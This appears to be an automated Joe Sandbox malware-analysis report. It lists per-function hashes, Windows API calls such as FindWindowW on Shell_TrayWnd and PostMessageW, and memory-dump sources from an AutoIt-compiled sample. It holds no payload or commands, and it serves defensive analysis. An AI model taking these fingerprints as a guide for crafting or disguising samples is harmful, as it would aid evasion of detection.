• API String ID: 3850602802-1403004172
• Opcode ID: 9d82e7220042eab2515f65231c5fcc4422539946a6d3ce22308c0c4a1f437473
• Instruction ID: cc748a3573c38cb689b53ae98b61121e76145524ab8496919b1c9196432e1bb3
• Opcode Fuzzy Hash: 9d82e7220042eab2515f65231c5fcc4422539946a6d3ce22308c0c4a1f437473
• Instruction Fuzzy Hash: 0B012471600118AFCB04FBA4CC52EFE33A9BF46350B14161DF566B32C2EF7158099791
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00EFB6EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 8f9a13cf27acaf71750e2060565a31399216e770b141d4dd0b0b096648fb8d88
• Instruction ID: 2b3e83868a78ba625e9b87519b247a19ff35bada35acc8a047785903357544f6
• Opcode Fuzzy Hash: 8f9a13cf27acaf71750e2060565a31399216e770b141d4dd0b0b096648fb8d88
• Instruction Fuzzy Hash: A701A2B1641008AFDB04EBA4CA52FFE73E99F06344F24101DF606B3282EF559E1997B6
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00EFB76C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 8b49426cf8a4b59d20f84021fd6f3f19e4513272a2605169ee25ea34660923ce
                                                                                                                                                                                                                                                      • Instruction ID: 264778ba1f1609242e9ea2fd58aae025fec47fdfdad70cb7207a9d03bce708e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b49426cf8a4b59d20f84021fd6f3f19e4513272a2605169ee25ea34660923ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 100126B5640008ABCB00FBA4CA02FFE73ED9B05304F64101EF505B32D2DB659E0A97B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadImageW.USER32(00EC0000,00000063,00000001,00000010,00000010,00000000), ref: 00EC4048
                                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(00000000,0000000E,00F067E9,00000063,00000000,75C10280,?,?,00EC3EE1,?,?,000000FF), ref: 00F341B3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnumImageLoadNamesResource
                                                                                                                                                                                                                                                      • String ID: >
                                                                                                                                                                                                                                                      • API String ID: 1578290342-260571596
                                                                                                                                                                                                                                                      • Opcode ID: 077a2e0c533f7af7c5289df4c55b00dbb9144db76f0df65856f444e687e4bb00
                                                                                                                                                                                                                                                      • Instruction ID: 69e82ed7d4f950c6ecbd9e131cc5261cb79a703661d6d0c3cc72f87d5dfb9e77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 077a2e0c533f7af7c5289df4c55b00dbb9144db76f0df65856f444e687e4bb00
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F09075640318B7E6204B1ABC4AFE23AADF715FB5F10020AF714EA1D0D2F19482FB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                                                                                                                                                      • String ID: #32770
                                                                                                                                                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                                                                                                                                                      • Opcode ID: f938c34e4bd962240e40ffd93c2152af889f7343371882f6d6de12840ce76c79
                                                                                                                                                                                                                                                      • Instruction ID: e0bccafb3bc57b5b49d674d6af6b830746452d434524c1ec85d69133fdae0132
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f938c34e4bd962240e40ffd93c2152af889f7343371882f6d6de12840ce76c79
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0D877A0432827DB10EAE5DC09ED7FFACEB51B60F010056F905E3181D670E64597D0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EFA63F
                                                                                                                                                                                                                                                        • Part of subcall function 00EE13F1: _doexit.LIBCMT ref: 00EE13FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                      • Opcode ID: 3adc532b41c8b9abf63be7c3643f7dfffc3190b0d12ceb15db436cc6773d5428
                                                                                                                                                                                                                                                      • Instruction ID: ab0c4fd518c0d57af3f513f0f8b988b56dc4b85c10d010e33f0e20c15c1bb4ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adc532b41c8b9abf63be7c3643f7dfffc3190b0d12ceb15db436cc6773d5428
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D0C23238035C32C21036986C07FC475888B15B52F090026BB0CA96C249E2D98111DA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00F3ACC0
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F3AEBD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: 14d186ddf0b6efc38c92bb6388171640fcdba9d7213b6beda26a6d06d83419ad
• Instruction ID: da701c1c75db05f4e7ed8296d1072ac06464786de37094520b7dced14bdf82d3
• Opcode Fuzzy Hash: 14d186ddf0b6efc38c92bb6388171640fcdba9d7213b6beda26a6d06d83419ad
• Instruction Fuzzy Hash: 47E06D71C04509DFCB11DBA6DD44AECB7B8AB98350F10A086E852B2260CB709A85FF22
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F286E2
• PostMessageW.USER32(00000000), ref: 00F286E9
  • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 994d3adc6b776d7f5ad6c792d70885d40e12e0d2812474e4d29c24448489802c
• Instruction ID: 8626a71a44977bd0e86b13b56dbd8a57bf738501905947fd2bb404cc85c93d48
• Opcode Fuzzy Hash: 994d3adc6b776d7f5ad6c792d70885d40e12e0d2812474e4d29c24448489802c
• Instruction Fuzzy Hash: 26D022323C03187BF22473309C0BFC63A089B16B10F000805BB49EA0D0C8E8F900E715
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F286A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F286B5
  • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: cc363a904462feb453188702e3c87a12ac96556a2960e02107831070e3cf7c1a
• Instruction ID: b6fb4fc34b92f63c2a60dcb31f5700bceecbf6979c10cffcde33092d4af7d0a1
• Opcode Fuzzy Hash: cc363a904462feb453188702e3c87a12ac96556a2960e02107831070e3cf7c1a
• Instruction Fuzzy Hash: EDD02236384318B7F22473309C0BFC63A089B11B10F000805BB4DAA0D0C8E8E900E710